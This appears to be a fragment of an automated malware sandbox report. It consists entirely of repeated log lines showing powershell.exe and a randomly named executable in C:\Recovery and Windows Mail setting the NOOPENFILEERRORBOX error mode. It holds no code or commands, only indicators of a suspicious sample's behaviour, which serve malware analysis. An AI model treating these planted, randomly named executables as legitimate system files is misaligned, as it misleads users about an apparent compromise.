                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
